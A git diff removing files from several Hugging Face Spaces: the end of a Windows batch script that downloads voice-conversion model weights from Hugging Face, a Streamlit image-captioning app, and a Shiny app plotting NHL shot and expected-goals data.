dlVR_DeEchoNormal=https://huggingface.co/lj1995/VoiceConversionWebUI/resolve/main/uvr5_weights/VR-DeEchoNormal.pth -set dlonnx_dereverb=https://huggingface.co/lj1995/VoiceConversionWebUI/resolve/main/uvr5_weights/onnx_dereverb_By_FoxJoy/vocals.onnx - -set hb=hubert_base.pt - -set dlhb=https://huggingface.co/lj1995/VoiceConversionWebUI/resolve/main/hubert_base.pt - -echo dir check start. -echo= - -if exist "%~dp0assets\pretrained" ( - echo dir .\assets\pretrained checked. - ) else ( - echo failed. generating dir .\assets\pretrained. - mkdir pretrained - ) -if exist "%~dp0assets\pretrained_v2" ( - echo dir .\assets\pretrained_v2 checked. - ) else ( - echo failed. generating dir .\assets\pretrained_v2. - mkdir pretrained_v2 - ) -if exist "%~dp0assets\uvr5_weights" ( - echo dir .\assets\uvr5_weights checked. - ) else ( - echo failed. generating dir .\assets\uvr5_weights. - mkdir uvr5_weights - ) -if exist "%~dp0assets\uvr5_weights\onnx_dereverb_By_FoxJoy" ( - echo dir .\assets\uvr5_weights\onnx_dereverb_By_FoxJoy checked. - ) else ( - echo failed. generating dir .\assets\uvr5_weights\onnx_dereverb_By_FoxJoy. - mkdir uvr5_weights\onnx_dereverb_By_FoxJoy - ) - -echo= -echo dir check finished. - -echo= -echo required files check start. - -echo checking D32k.pth -if exist "%~dp0assets\pretrained\D32k.pth" ( - echo D32k.pth in .\assets\pretrained checked. - echo= - ) else ( - echo failed. starting download from huggingface. - %~dp0%aria2%\aria2c --console-log-level=error -c -x 16 -s 16 -k 1M https://huggingface.co/lj1995/VoiceConversionWebUI/resolve/main/pretrained/D32k.pth -d %~dp0assets\pretrained -o D32k.pth - if exist "%~dp0assets\pretrained\D32k.pth" (echo download successful.) else (echo please try again! - echo=) - ) -echo checking D40k.pth -if exist "%~dp0assets\pretrained\D40k.pth" ( - echo D40k.pth in .\assets\pretrained checked. - echo= - ) else ( - echo failed. starting download from huggingface. - %~dp0%aria2%\aria2c --console-log-level=error -c -x 16 -s 16 -k 1M https://huggingface.co/lj1995/VoiceConversionWebUI/resolve/main/pretrained/D40k.pth -d %~dp0assets\pretrained -o D40k.pth - if exist "%~dp0assets\pretrained\D40k.pth" (echo download successful.) else (echo please try again! - echo=) - ) -echo checking D40k.pth -if exist "%~dp0assets\pretrained_v2\D40k.pth" ( - echo D40k.pth in .\assets\pretrained_v2 checked. - echo= - ) else ( - echo failed. starting download from huggingface. - %~dp0%aria2%\aria2c --console-log-level=error -c -x 16 -s 16 -k 1M https://huggingface.co/lj1995/VoiceConversionWebUI/resolve/main/pretrained_v2/D40k.pth -d %~dp0assets\pretrained_v2 -o D40k.pth - if exist "%~dp0assets\pretrained_v2\D40k.pth" (echo download successful.) else (echo please try again! - echo=) - ) -echo checking D48k.pth -if exist "%~dp0assets\pretrained\D48k.pth" ( - echo D48k.pth in .\assets\pretrained checked. - echo= - ) else ( - echo failed. starting download from huggingface. - %~dp0%aria2%\aria2c --console-log-level=error -c -x 16 -s 16 -k 1M https://huggingface.co/lj1995/VoiceConversionWebUI/resolve/main/pretrained/D48k.pth -d %~dp0assets\pretrained -o D48k.pth - if exist "%~dp0assets\pretrained\D48k.pth" (echo download successful.) else (echo please try again! - echo=) - ) -echo checking G32k.pth -if exist "%~dp0assets\pretrained\G32k.pth" ( - echo G32k.pth in .\assets\pretrained checked. - echo= - ) else ( - echo failed. starting download from huggingface. - %~dp0%aria2%\aria2c --console-log-level=error -c -x 16 -s 16 -k 1M https://huggingface.co/lj1995/VoiceConversionWebUI/resolve/main/pretrained/G32k.pth -d %~dp0assets\pretrained -o G32k.pth - if exist "%~dp0assets\pretrained\G32k.pth" (echo download successful.) else (echo please try again! - echo=) - ) -echo checking G40k.pth -if exist "%~dp0assets\pretrained\G40k.pth" ( - echo G40k.pth in .\assets\pretrained checked. - echo= - ) else ( - echo failed. starting download from huggingface. - %~dp0%aria2%\aria2c --console-log-level=error -c -x 16 -s 16 -k 1M https://huggingface.co/lj1995/VoiceConversionWebUI/resolve/main/pretrained/G40k.pth -d %~dp0assets\pretrained -o G40k.pth - if exist "%~dp0assets\pretrained\G40k.pth" (echo download successful.) else (echo please try again! - echo=) - ) -echo checking G40k.pth -if exist "%~dp0assets\pretrained_v2\G40k.pth" ( - echo G40k.pth in .\assets\pretrained_v2 checked. - echo= - ) else ( - echo failed. starting download from huggingface. - %~dp0%aria2%\aria2c --console-log-level=error -c -x 16 -s 16 -k 1M https://huggingface.co/lj1995/VoiceConversionWebUI/resolve/main/pretrained_v2/G40k.pth -d %~dp0assets\pretrained_v2 -o G40k.pth - if exist "%~dp0assets\pretrained_v2\G40k.pth" (echo download successful.) else (echo please try again! - echo=) - ) -echo checking G48k.pth -if exist "%~dp0assets\pretrained\G48k.pth" ( - echo G48k.pth in .\assets\pretrained checked. - echo= - ) else ( - echo failed. starting download from huggingface. - %~dp0%aria2%\aria2c --console-log-level=error -c -x 16 -s 16 -k 1M https://huggingface.co/lj1995/VoiceConversionWebUI/resolve/main/pretrained/G48k.pth -d %~dp0assets\pretrained -o G48k.pth - if exist "%~dp0assets\pretrained\G48k.pth" (echo download successful.) else (echo please try again! - echo=) - ) - -echo checking %d32% -if exist "%~dp0assets\pretrained\%d32%" ( - echo %d32% in .\assets\pretrained checked. - echo= - ) else ( - echo failed. starting download from huggingface. - %~dp0%aria2%\aria2c --console-log-level=error -c -x 16 -s 16 -k 1M %dld32% -d %~dp0assets\pretrained -o %d32% - if exist "%~dp0assets\pretrained\%d32%" (echo download successful.) else (echo please try again! - echo=) - ) -echo checking %d40% -if exist "%~dp0assets\pretrained\%d40%" ( - echo %d40% in .\assets\pretrained checked. - echo= - ) else ( - echo failed. starting download from huggingface. - %~dp0%aria2%\aria2c --console-log-level=error -c -x 16 -s 16 -k 1M %dld40% -d %~dp0assets\pretrained -o %d40% - if exist "%~dp0assets\pretrained\%d40%" (echo download successful.) else (echo please try again! - echo=) - ) -echo checking %d40v2% -if exist "%~dp0assets\pretrained_v2\%d40v2%" ( - echo %d40v2% in .\assets\pretrained_v2 checked. - echo= - ) else ( - echo failed. starting download from huggingface. - %~dp0%aria2%\aria2c --console-log-level=error -c -x 16 -s 16 -k 1M %dld40v2% -d %~dp0assets\pretrained_v2 -o %d40v2% - if exist "%~dp0assets\pretrained_v2\%d40v2%" (echo download successful.) else (echo please try again! - echo=) - ) -echo checking %d48% -if exist "%~dp0assets\pretrained\%d48%" ( - echo %d48% in .\assets\pretrained checked. - echo= - ) else ( - echo failed. starting download from huggingface. - %~dp0%aria2%\aria2c --console-log-level=error -c -x 16 -s 16 -k 1M %dld48% -d %~dp0assets\pretrained -o %d48% - if exist "%~dp0assets\pretrained\%d48%" (echo download successful.) else (echo please try again! - echo=) - ) -echo checking %g32% -if exist "%~dp0assets\pretrained\%g32%" ( - echo %g32% in .\assets\pretrained checked. - echo= - ) else ( - echo failed. starting download from huggingface. - %~dp0%aria2%\aria2c --console-log-level=error -c -x 16 -s 16 -k 1M %dlg32% -d %~dp0assets\pretrained -o %g32% - if exist "%~dp0assets\pretrained\%g32%" (echo download successful.) else (echo please try again! - echo=) - ) -echo checking %g40% -if exist "%~dp0assets\pretrained\%g40%" ( - echo %g40% in .\assets\pretrained checked. - echo= - ) else ( - echo failed. starting download from huggingface. - %~dp0%aria2%\aria2c --console-log-level=error -c -x 16 -s 16 -k 1M %dlg40% -d %~dp0assets\pretrained -o %g40% - if exist "%~dp0assets\pretrained\%g40%" (echo download successful.) else (echo please try again! - echo=) - ) -echo checking %g40v2% -if exist "%~dp0assets\pretrained_v2\%g40v2%" ( - echo %g40v2% in .\assets\pretrained_v2 checked. - echo= - ) else ( - echo failed. starting download from huggingface. - %~dp0%aria2%\aria2c --console-log-level=error -c -x 16 -s 16 -k 1M %dlg40v2% -d %~dp0assets\pretrained_v2 -o %g40v2% - if exist "%~dp0assets\pretrained_v2\%g40v2%" (echo download successful.) else (echo please try again! - echo=) - ) -echo checking %g48% -if exist "%~dp0assets\pretrained\%g48%" ( - echo %g48% in .\assets\pretrained checked. - echo= - ) else ( - echo failed. starting download from huggingface. - %~dp0%aria2%\aria2c --console-log-level=error -c -x 16 -s 16 -k 1M %dlg48% -d %~dp0assets\pretrained -o %g48% - if exist "%~dp0assets\pretrained\%g48%" (echo download successful.) else (echo please try again! - echo=) - ) - -echo checking %hp2_all% -if exist "%~dp0assets\uvr5_weights\%hp2_all%" ( - echo %hp2_all% in .\assets\uvr5_weights checked. - echo= - ) else ( - echo failed. starting download from huggingface. - %~dp0%aria2%\aria2c --console-log-level=error -c -x 16 -s 16 -k 1M %dlhp2_all% -d %~dp0assets\uvr5_weights -o %hp2_all% - if exist "%~dp0assets\uvr5_weights\%hp2_all%" (echo download successful.) else (echo please try again! - echo=) - ) -echo checking %hp3_all% -if exist "%~dp0assets\uvr5_weights\%hp3_all%" ( - echo %hp3_all% in .\assets\uvr5_weights checked. - echo= - ) else ( - echo failed. starting download from huggingface. - %~dp0%aria2%\aria2c --console-log-level=error -c -x 16 -s 16 -k 1M %dlhp3_all% -d %~dp0assets\uvr5_weights -o %hp3_all% - if exist "%~dp0assets\uvr5_weights\%hp3_all%" (echo download successful.) else (echo please try again! - echo=) - ) -echo checking %hp5_only% -if exist "%~dp0assets\uvr5_weights\%hp5_only%" ( - echo %hp5_only% in .\assets\uvr5_weights checked. - echo= - ) else ( - echo failed. starting download from huggingface. - %~dp0%aria2%\aria2c --console-log-level=error -c -x 16 -s 16 -k 1M %dlhp5_only% -d %~dp0assets\uvr5_weights -o %hp5_only% - if exist "%~dp0assets\uvr5_weights\%hp5_only%" (echo download successful.) else (echo please try again! - echo=) - ) -echo checking %VR_DeEchoAggressive% -if exist "%~dp0assets\uvr5_weights\%VR_DeEchoAggressive%" ( - echo %VR_DeEchoAggressive% in .\assets\uvr5_weights checked. - echo= - ) else ( - echo failed. starting download from huggingface. - %~dp0%aria2%\aria2c --console-log-level=error -c -x 16 -s 16 -k 1M %dlVR_DeEchoAggressive% -d %~dp0assets\uvr5_weights -o %VR_DeEchoAggressive% - if exist "%~dp0assets\uvr5_weights\%VR_DeEchoAggressive%" (echo download successful.) else (echo please try again! - echo=) - ) -echo checking %VR_DeEchoDeReverb% -if exist "%~dp0assets\uvr5_weights\%VR_DeEchoDeReverb%" ( - echo %VR_DeEchoDeReverb% in .\assets\uvr5_weights checked. - echo= - ) else ( - echo failed. starting download from huggingface. - %~dp0%aria2%\aria2c --console-log-level=error -c -x 16 -s 16 -k 1M %dlVR_DeEchoDeReverb% -d %~dp0assets\uvr5_weights -o %VR_DeEchoDeReverb% - if exist "%~dp0assets\uvr5_weights\%VR_DeEchoDeReverb%" (echo download successful.) else (echo please try again! - echo=) - ) -echo checking %VR_DeEchoNormal% -if exist "%~dp0assets\uvr5_weights\%VR_DeEchoNormal%" ( - echo %VR_DeEchoNormal% in .\assets\uvr5_weights checked. - echo= - ) else ( - echo failed. starting download from huggingface. - %~dp0%aria2%\aria2c --console-log-level=error -c -x 16 -s 16 -k 1M %dlVR_DeEchoNormal% -d %~dp0assets\uvr5_weights -o %VR_DeEchoNormal% - if exist "%~dp0assets\uvr5_weights\%VR_DeEchoNormal%" (echo download successful.) else (echo please try again! - echo=) - ) -echo checking %onnx_dereverb% -if exist "%~dp0assets\uvr5_weights\onnx_dereverb_By_FoxJoy\%onnx_dereverb%" ( - echo %onnx_dereverb% in .\assets\uvr5_weights\onnx_dereverb_By_FoxJoy checked. - echo= - ) else ( - echo failed. starting download from huggingface. - %~dp0%aria2%\aria2c --console-log-level=error -c -x 16 -s 16 -k 1M %dlonnx_dereverb% -d %~dp0assets\uvr5_weights\onnx_dereverb_By_FoxJoy -o %onnx_dereverb% - if exist "%~dp0assets\uvr5_weights\onnx_dereverb_By_FoxJoy\%onnx_dereverb%" (echo download successful.) else (echo please try again! - echo=) - ) - -echo checking %hb% -if exist "%~dp0assets\hubert\%hb%" ( - echo %hb% in .\assets\hubert\pretrained checked. - echo= - ) else ( - echo failed. starting download from huggingface. - %~dp0%aria2%\aria2c --console-log-level=error -c -x 16 -s 16 -k 1M %dlhb% -d %~dp0assets\hubert\ -o %hb% - if exist "%~dp0assets\hubert\%hb%" (echo download successful.) else (echo please try again! - echo=) - ) - -echo required files check finished. -echo envfiles check complete. -pause -:end -del flag.txt diff --git a/spaces/Soumen/image_to_text/app.py b/spaces/Soumen/image_to_text/app.py deleted file mode 100644 index 264d9713117154bb6fe0cad184929419b98c2952..0000000000000000000000000000000000000000 --- a/spaces/Soumen/image_to_text/app.py +++ /dev/null @@ -1,56 +0,0 @@ -import streamlit as st -import torch -from PIL import Image -from transformers import VisionEncoderDecoderModel, ViTFeatureExtractor, AutoTokenizer -#pickle.load(open('energy_model.pkl', 'rb')) -#vocab = np.load('w2i.p', allow_pickle=True) -st.title("Image_Captioning_App") -@st.experimental_singleton -def load_models(): - model = VisionEncoderDecoderModel.from_pretrained("nlpconnect/vit-gpt2-image-captioning") - feature_extractor = ViTFeatureExtractor.from_pretrained("nlpconnect/vit-gpt2-image-captioning") - tokenizer = AutoTokenizer.from_pretrained("nlpconnect/vit-gpt2-image-captioning") - return model, feature_extractor, tokenizer -#st.text("Build with Streamlit and OpenCV") -if "photo" not in st.session_state: - st.session_state["photo"]="not done" -c2, c3 = st.columns([2,1]) -def change_photo_state(): - st.session_state["photo"]="done" -@st.cache -def load_image(img): - im = Image.open(img) - return im -uploaded_photo = c3.file_uploader("Upload Image",type=['jpg','png','jpeg'], on_change=change_photo_state) -camera_photo = c2.camera_input("Take a photo", on_change=change_photo_state) - -#st.subheader("Detection") -if st.checkbox("Generate_Caption"): - model, feature_extractor, tokenizer = load_models() - device = torch.device("cuda" if torch.cuda.is_available() else "cpu") - model.to(device) - max_length = 16 - num_beams = 4 - gen_kwargs = {"max_length": max_length, "num_beams": num_beams} - def predict_step(our_image): - if our_image.mode != "RGB": - our_image = our_image.convert(mode="RGB") - pixel_values = feature_extractor(images=our_image, return_tensors="pt").pixel_values - pixel_values = pixel_values.to(device) - output_ids = model.generate(pixel_values, **gen_kwargs) - preds = tokenizer.batch_decode(output_ids, skip_special_tokens=True) - preds = [pred.strip() for pred in preds] - return preds - if st.session_state["photo"]=="done": - if uploaded_photo: - our_image= load_image(uploaded_photo) - elif camera_photo: - our_image= load_image(camera_photo) - elif uploaded_photo==None and camera_photo==None: - pass - #our_image= load_image('image.jpg') - st.success(predict_step(our_image)) -elif st.checkbox("About"): - st.subheader("About Image Captioning App") - st.markdown("Built with Streamlit by [Soumen Sarker](https://soumen-sarker-personal-website.streamlit.app/)") - st.markdown("Demo applicaton of the following model [credit](https://huggingface.co/nlpconnect/vit-gpt2-image-captioning/)") \ No newline at end of file diff --git a/spaces/StatsByZach/app/game.py b/spaces/StatsByZach/app/game.py deleted file mode 100644 index ca2fa0612915dad33ea5b054d8d9274415d76d15..0000000000000000000000000000000000000000 --- a/spaces/StatsByZach/app/game.py +++ /dev/null @@ -1,741 +0,0 @@ -##### game.,py ##### - -# Import modules -from shiny import * -import shinyswatch -import plotly.express as px -from shinywidgets import output_widget, render_widget -import pandas as pd -from configure import base_url -import matplotlib.pyplot as plt -from hockey_rink import NHLRink -from matplotlib.lines import Line2D -import numpy as np -import plotly.express as px -from scipy.interpolate import interp1d -import plotly.graph_objects as go -# Paths to data -shots = "data/test_shots.csv" -info = "data/game_list.csv" -xg = "data/on_ice_xg_by_game.csv" -#data = pd.read_csv(shots) -def server(input,output,session): - game_id = session.http_conn.path_params['game_id'] - game_shots = pd.read_csv(shots) - game_info = pd.read_csv(info) - xg_df = pd.read_csv(xg) - @output - @render.text - def text(): - #t = session.__dir__() - #This is how it woks. Neat! Woooo! - t = session.http_conn.path_params['game_id'] - return t - - @output - @render.text - def game_info_teams(): - gi = game_info - gi = gi[gi['Game_Id']==int(game_id)] - away_team = gi['Away'].tolist()[0] - home_team = gi['Home'].tolist()[0] - date = gi['Date'].tolist()[0] - string = away_team + " @ " + home_team - return string - - @output - @render.text - def game_info_date(): - gi = game_info - gi = gi[gi['Game_Id']==int(game_id)] - date = gi['Date'].tolist()[0] - string = date - return string - - @output - @render.table - def table(): - df = game_shots - df = df[df['Game_Id']==int(game_id)] - df = df[df['Event']=="GOAL"][['p1_name','Event','xG']] - return df - - @reactive.Effect - def _(): - gi = game_shots - gi = gi[gi['Game_Id']==int(game_id)] - max_p = gi['Period'].max() - if max_p >3: - choices = ["All",1,2,3,"OT"] - else: - choices = ["All",1,2,3] - ui.update_select( - "period", - choices=choices - ) - - - @output - @render.plot - def a_scatter_plot(): - gi = game_shots - gi = gi[gi['Game_Id']==int(game_id)] - if input.strength() == "All": - gi = gi - strength_str = "All" - elif input.strength() =="Even": - gi = gi[(gi['Strength_Mapped']=="even")] - strength_str = "EV" - else: - gi = gi[(gi['homeSkatersOnIce']==5)&(gi['awaySkatersOnIce']==5)] - strength_str = "5v5" - if input.period()=="All": - gi=gi - title_p="" - elif input.period() == "OT": - gi = gi[gi['Period']>3] - title_p = " OT" - else: - gi = gi[gi['Period']==int(input.period())] - title_p = " Period "+str(input.period()) - away_team = gi['Away_Team'].tolist()[0] - home_team = gi['Home_Team'].tolist()[0] - home_shots = gi[(gi['Ev_Team']==home_team)] - away_shots = gi[(gi['Ev_Team']==away_team)] - date = gi["Date"].tolist()[0] - nhl_rink = NHLRink(rotation=90) - fig=plt.figure(figsize=(100,100)) - plt.xlim([0,100]) - plt.ylim([-42.5, 42.5]) - rink = NHLRink() - rink.draw() - plt.scatter((home_shots['xCordAdjusted']),(home_shots['yCordAdjusted']), (home_shots['xG']*1500) ,c= np.where((home_shots['Event']=="GOAL"),'green',np.where((home_shots['Event']=="SHOT"),'orange','red')),zorder=10,edgecolors='black',linewidth=1) - plt.scatter((away_shots['xCordAdjusted']*-1),(away_shots['yCordAdjusted']*-1), (away_shots['xG']*1500) ,c= np.where((away_shots['Event']=="GOAL"),'green',np.where((away_shots['Event']=="SHOT"),'orange','red')),zorder=10,edgecolors='black',linewidth=1) - fig.patch.set_facecolor('#222222') - #plt.title(away_team+" @ "+home_team+"\n"+date+"\nAll Unblocked Shot Attempts\nStrength: "+strength_str+title_p,color= 'white',size=12) - plt.title(away_team+" @ "+home_team+" - "+date+'\n'+strength_str+title_p+" Unblocked Shot Attempts",color="white") - plt.text(55,44,home_team+"\n"+str(round(home_shots['xG'].sum(),3))+" xG",color="white",horizontalalignment='center',size=12) - plt.text(-55,44,away_team+"\n"+str(round(away_shots['xG'].sum(),3))+" xG",color="white",horizontalalignment='center',size=12) - custom_points = [Line2D([0], [0], marker='o', color='w', label='shot', markerfacecolor='orange', markersize=15), - Line2D([0], [0], marker='o', color='w', label='miss', markerfacecolor='red', markersize=15), - Line2D([0], [0], marker='o', color='w', label='goal', markerfacecolor='green', markersize=15)] - - return fig - - @output - @render_widget - def my_widget(): - gi = game_info - gi = gi[gi['Game_Id']==int(game_id)] - away_team = gi['Away'].tolist()[0] - home_team = gi['Home'].tolist()[0] - date = gi['Date'].tolist()[0] - data = xg_df - data = data[data['Game_Id']==int(game_id)] - data = data[data['Team']==home_team] - if input.strength_for_bars()=="even": - xgf = "EV_xGF" - xga = "EV_xGA" - xgfp = "EV_xGF%" - toi = "EV_TOI" - title = "EV" - x_title = "Even Strength xGF%" - elif input.strength_for_bars()=="_5v5": - xgf = "5v5_xGF" - xga = "5v5_xGA" - toi = "5v5_TOI" - title = "5v5" - x_title = "5v5 xGF%" - else: - xgf = "ALL_xGF" - xga = "ALL_xGA" - toi = "ALL_TOI" - title = "All" - x_title = "All Situation xGF%" - data['xGF%'] = data[xgf]/(data[xgf]+data[xga])*100 - data = data.sort_values(by=['xGF%']) - data = data[data['xGF%']>0] - data['xGF%_str'] = data['xGF%'].round(4) - data['xGF%_str'] = data['xGF%_str'] .map('{:,.2f}%'.format) - fig = px.bar(data, x='xGF%', y='Player',text=('xGF%_str'), - color=toi,color_continuous_scale=px.colors.sequential.Oryel,template="plotly_dark",height=750,width=750, - ) - fig.update_layout(plot_bgcolor="#222222",paper_bgcolor="#222222") - fig.update_traces(marker_line_color='#FFFFFF', - marker_line_width=1.5) - fig.update_layout( - title=(home_team + " Skaters "+ title + " On-Ice xGF%
      "+away_team +" @ "+home_team+"
      "+date),margin=dict(r=20, l=40, b=100, t=90)) - fig.update_xaxes(range=[0, 100]) - fig.update_xaxes(tickvals=[0,25,50,75,100],ticktext=['0%','25%','50%','75%','100%']) - fig.add_annotation( - text = ("Data: @StatsByZach on Twitter") - , showarrow=False - , x = .70 - , y = -.06 - , xref='paper' - , yref='paper' - , xanchor='left' - , yanchor='bottom' - , xshift=-1 - , yshift=-5 - , font=dict(size=11, color="white") - , align="left" - ) - fig.update_layout(xaxis_title=x_title) - return fig - - @output - @render_widget - def my_widget2(): - gi = game_info - gi = gi[gi['Game_Id']==int(game_id)] - away_team = gi['Away'].tolist()[0] - home_team = gi['Home'].tolist()[0] - date = gi['Date'].tolist()[0] - data = xg_df - data = data[data['Game_Id']==int(game_id)] - data = data[data['Team']==away_team] - if input.strength_for_bars()=="even": - xgf = "EV_xGF" - xga = "EV_xGA" - xgfp = "EV_xGF%" - toi = "EV_TOI" - title = "EV" - x_title = "Even Strength xGF%" - elif input.strength_for_bars()=="_5v5": - xgf = "5v5_xGF" - xga = "5v5_xGA" - toi = "5v5_TOI" - title = "5v5" - x_title = "5v5 xGF%" - else: - xgf = "ALL_xGF" - xga = "ALL_xGA" - toi = "ALL_TOI" - title = "All" - x_title = "All Situation xGF%" - data['xGF%'] = data[xgf]/(data[xgf]+data[xga])*100 - data = data.sort_values(by=['xGF%']) - data = data[data['xGF%']>0] - data['xGF%_str'] = data['xGF%'].round(4) - data['xGF%_str'] = data['xGF%_str'] .map('{:,.2f}%'.format) - fig = px.bar(data, x='xGF%', y='Player',text=('xGF%_str'), - color=toi,color_continuous_scale=px.colors.sequential.Oryel,template="plotly_dark",height=750,width=750, - ) - fig.update_layout(plot_bgcolor="#222222",paper_bgcolor="#222222") - fig.update_traces(marker_line_color='#FFFFFF', - marker_line_width=1.5) - fig.update_layout( - title=(away_team + " Skaters "+ title + " On-Ice xGF%
      "+away_team +" @ "+home_team+"
      "+date),margin=dict(r=20, l=40, b=100, t=90)) - fig.update_xaxes(range=[0, 100]) - fig.update_xaxes(tickvals=[0,25,50,75,100],ticktext=['0%','25%','50%','75%','100%']) - fig.add_annotation( - text = ("Data: @StatsByZach on Twitter") - , showarrow=False - , x = .70 - , y = -.06 - , xref='paper' - , yref='paper' - , xanchor='left' - , yanchor='bottom' - , xshift=-1 - , yshift=-5 - , font=dict(size=11, color="white") - , align="left" - ) - fig.update_layout(xaxis_title=x_title) - return fig - - @output - @render_widget - def my_widget3(): - gi = game_shots - gi = gi[gi['Game_Id']==int(game_id)] - if input.strength() == "All": - gi = gi - strength_str = "All Situations" - elif input.strength() =="Even": - gi = gi[(gi['Strength_Mapped']=="even")] - strength_str = "Even Strength" - else: - gi = gi[(gi['homeSkatersOnIce']==5)&(gi['awaySkatersOnIce']==5)] - strength_str = "5v5" - if input.period()=="All": - gi=gi - title_p="" - elif input.period() == "OT": - gi = gi[gi['Period']>3] - title_p = " OT" - else: - gi = gi[gi['Period']==int(input.period())] - title_p = " Period "+str(input.period()) - away_team = gi['Away_Team'].tolist()[0] - home_team = gi['Home_Team'].tolist()[0] - date = gi["Date"].tolist()[0] - gi = gi.reset_index() - gi['xCordAdjusted'] = np.where(gi['isHomeTeam']==0,gi['xCordAdjusted']*-1,gi['xCordAdjusted']) - gi['yCordAdjusted'] = np.where(gi['isHomeTeam']==0,gi['yCordAdjusted']*-1,gi['yCordAdjusted']) - home_shots = gi[(gi['Ev_Team']==home_team)] - away_shots = gi[(gi['Ev_Team']==away_team)] - home_xg = round(home_shots['xG'].sum(),3) - away_xg = round(away_shots['xG'].sum(),3) - gi = gi.rename(columns={"p1_name":"Shooter"}) - fig = px.scatter(gi,'xCordAdjusted','yCordAdjusted',size='xG',color="Event",color_discrete_map={'MISS':"#ff7575",'GOAL':"#81ff75",'SHOT':"#ffd375"},hover_data=['Shooter','xG','Event','Period','goalieAgainst']) - fig.add_shape(type="rect", - x0=-100, y0=-45, x1=100, y1=45, - line=dict( - color="#222222", - width=2, - ), - fillcolor="#222222", - ) - fig.add_shape(type="line", - x0=100, - y0=-17, - x1=100, - y1=17,line=dict(color="#FFFFFF",width=5)) - fig.add_shape(type="line", - x0=-70, - y0=45, - x1=70, - y1=45,line=dict(color="#FFFFFF",width=5)) - - fig.add_shape(type="circle", - xref="x", yref="y", - x0=-40, y0=10, x1=-100, y1=-45, - line=dict(color="#FFFFFF",width=5), - ) - fig.add_shape(type="circle", - xref="x", yref="y", - x0=40, y0=-10, x1=100, y1=45, - line=dict(color="#FFFFFF",width=5)), - - fig.add_shape(type="circle", - xref="x", yref="y", - x0=-40, y0=-10, x1=-100, y1=45, - line=dict(color="#FFFFFF",width=5)), - - fig.add_shape(type="circle", - xref="x", yref="y", - x0=40, y0=10, x1=100, y1=-45, - line=dict(color="#FFFFFF",width=5)), - - fig.add_shape(type="rect", - x0=-99.5, y0=-18, x1=-30, y1=18, - line=dict( - color="#222222", - width=2, - ), - fillcolor="#222222", - ) - - fig.add_shape(type="rect", - x0=-70, y0=-44.5, x1=-30, y1=44.5, - line=dict( - color="#222222", - width=2, - ), - fillcolor="#222222", - ) - - fig.add_shape(type="rect", - x0=99.5, y0=-18, x1=30, y1=18, - line=dict( - color="#222222", - width=2, - ), - fillcolor="#222222", - ) - - fig.add_shape(type="rect", - x0=70, y0=-44.5, x1=30, y1=44.5, - line=dict( - color="#222222", - width=2, - ), - fillcolor="#222222", - ) - - - - fig.add_shape(type="line", - x0=-70, - y0=-45, - x1=70, - y1=-45,line=dict(color="#FFFFFF",width=5)) - fig.add_shape(type="line", - x0=-100, - y0=-17, - x1=-100, - y1=17,line=dict(color="#FFFFFF",width=5)) - fig.add_shape(type="line", - x0=0, - y0=-44.9, - x1=0, - y1=44.9,line=dict(color="#c76969",width=5)) - fig.add_shape(type="line", - x0=89, - y0=-38.1, - x1=89, - y1=38.1,line=dict(color="#c76969",width=4)) - fig.add_shape(type="line", - x0=25, - y0=-44.7, - x1=25, - y1=44.7,line=dict(color="#6987c7",width=5)) - fig.add_shape(type="line", - x0=-25, - y0=-44.7, - x1=-25, - y1=44.7,line=dict(color="#6987c7",width=5)) - - fig.add_shape(type="circle", - xref="x", yref="y", - x0=-15, y0=-15, x1=15, y1=15, - line=dict(color="#6998c7",width=4), - ) - fig.add_shape(type="circle", - xref="x", yref="y", - x0=53, y0=7, x1=83, y1=37, - line=dict(color="#c76969",width=4), - ) - fig.add_shape(type="circle", - xref="x", yref="y", - x0=-53, y0=7, x1=-83, y1=37, - line=dict(color="#c76969",width=4), - ) - fig.add_shape(type="circle", - xref="x", yref="y", - x0=-53, y0=-7, x1=-83, y1=-37, - line=dict(color="#c76969",width=4), - ) - fig.add_shape(type="circle", - xref="x", yref="y", - x0=53, y0=-7, x1=83, y1=-37, - line=dict(color="#c76969",width=4), - ) - fig.add_shape(type="line", - x0=-89, - y0=-38.1, - x1=-89, - y1=38.1,line=dict(color="#c76969",width=4)) - fig.add_shape(type="line", - x0=-89, - y0=-3, - x1=-89, - y1=3,line=dict(color="#FFFFFF",width=5)) - fig.add_shape(type="line", - x0=89, - y0=-3, - x1=89, - y1=3,line=dict(color="#FFFFFF",width=5)) - - fig.update_layout(xaxis=dict(showgrid=False,zeroline=False,visible= False), - yaxis=dict(showgrid=False,zeroline=False,visible= False), - width=1400,height=630 - ) - fig.update_layout(plot_bgcolor='#222222', - paper_bgcolor='#222222',) - fig.update_layout(title_text=away_team+' @ '+ home_team +' - '+ date +'
      All Unblocked Shot Attempts - '+strength_str + title_p, title_x=0.5) - fig.update_layout( - font_color="white",) - # Create custom shapes for the points - shots_list = home_shots['level_0'].to_list() - for s in shots_list: - xc=home_shots.loc[home_shots['level_0']==s]['xCordAdjusted'].tolist()[0] - yc=home_shots.loc[home_shots['level_0']==s]['yCordAdjusted'].tolist()[0] - xg = home_shots.loc[home_shots['level_0']==s]['xG'].tolist()[0] - t = home_shots.loc[home_shots['level_0']==s]['Event'].tolist()[0] - if t=="MISS": - c = "#fa5f5f" - elif t=='SHOT': - c="#fad85f" - else: - c="#8dfa5f" - if xg < .03: - mul = 25 - elif xg >=.03 and xg < .07: - mul = 23 - elif xg >= .07 and xg < .11: - mul = 20 - elif xg >= .11 and xg < .15: - mul = 17 - else: - mul = 7 - fig.add_shape( - type='circle', - x0=xc - xg*mul, - y0=yc - xg*mul, - x1=xc + xg*mul, - y1=yc + xg*mul, - fillcolor=c, - opacity=1, - line=dict(color="#FFFFFF",width=1) - ) - # Create custom shapes for the points - shots_list = away_shots['level_0'].to_list() - for s in shots_list: - xc=away_shots.loc[away_shots['level_0']==s]['xCordAdjusted'].tolist()[0] - yc=away_shots.loc[away_shots['level_0']==s]['yCordAdjusted'].tolist()[0] - xg = away_shots.loc[away_shots['level_0']==s]['xG'].tolist()[0] - t = away_shots.loc[away_shots['level_0']==s]['Event'].tolist()[0] - if t=="MISS": - c = "#fa5f5f" - elif t=='SHOT': - c="#fad85f" - else: - c="#8dfa5f" - if xg < .03: - mul = 25 - elif xg >=.03 and xg < .07: - mul = 23 - elif xg >= .07 and xg < .11: - mul = 20 - elif xg >= .11 and xg < .15: - mul = 17 - else: - mul = 7 - fig.add_shape( - type='circle', - x0=xc - xg*mul, - y0=yc - xg*mul, - x1=xc + xg*mul, - y1=yc + xg*mul, - fillcolor=c, - opacity=1, - line=dict(color="#FFFFFF",width=1) - ) - fig.add_annotation( - text = ("Data: @StatsByZach on Twitter") - , showarrow=False - , x = .79 - , y = -.03 